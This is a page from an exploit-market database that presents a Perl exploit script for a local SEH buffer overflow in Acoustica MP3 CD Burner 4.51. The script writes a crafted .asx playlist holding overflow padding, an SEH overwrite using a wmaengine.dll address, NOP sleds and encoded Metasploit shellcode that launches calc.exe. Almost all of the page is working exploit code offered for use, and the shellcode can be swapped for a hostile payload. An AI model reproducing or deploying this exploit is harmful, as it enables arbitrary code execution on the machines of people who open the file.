[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BOF Exploit

Author
Koshi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7799
Category
local exploits
Date add
28-08-2008
Platform
unsorted
===================================================================
Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BOF Exploit
===================================================================



#!/usr/bin/perl
#
# Acoustica MP3 CD Burner (asx file) Local BOF Exploit
# Author: Koshi
#
# Date: 08-29-08 ( 0day )
# Application: Acoustica MP3 CD Burner
# Version: 4.51 Build 147 ( possibly older )
# Site: http://acoustica.com/download.htm
# Tested On: Windows XP SP3 Fully Patched
#
# Based off of n00b's findings http://www.milw0rm.com/exploits/4017
# gr33tz: Rima my baby, str0ke, n00b ( nice find )


# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
"\x50\x66";

my $bof = "A"x480;
my $led = "\x90"x35;
my $fill = "\x90"x150;
my $buff = "".
	   "$bof".
	   "\xeb\x06\x90\x90". ### Pointer to next SEH record			   ###
	   "\x65\x82\x19\x01". ### SE handler wmaengine.dll POP POP RET 0x01198265 ###
	   "$led".
	   "$shellcode".
	   "$fill";

my $tuff = "".
	   "<ASX VERSION\=\x22\x33\x2e\x30\x22\x3e\n".
	   "<ENTRY>\n".
	   "<TITLE>Acoustica MP3 CD Burner Local BOF Exploit</TITLE>\n".
	   "<REF HREF=\x22$buff.asf\x22\x2f\x3e\n".
	   "</ENTRY>\n</ASX>\n";

open (MYFILE, '>>Exploit.asx');
binmode(MYFILE);
print MYFILE "$tuff";
close (MYFILE);
print "Exploit file has been created. ( Exploit.asx )\n";



#  0day.today [2024-12-25]  #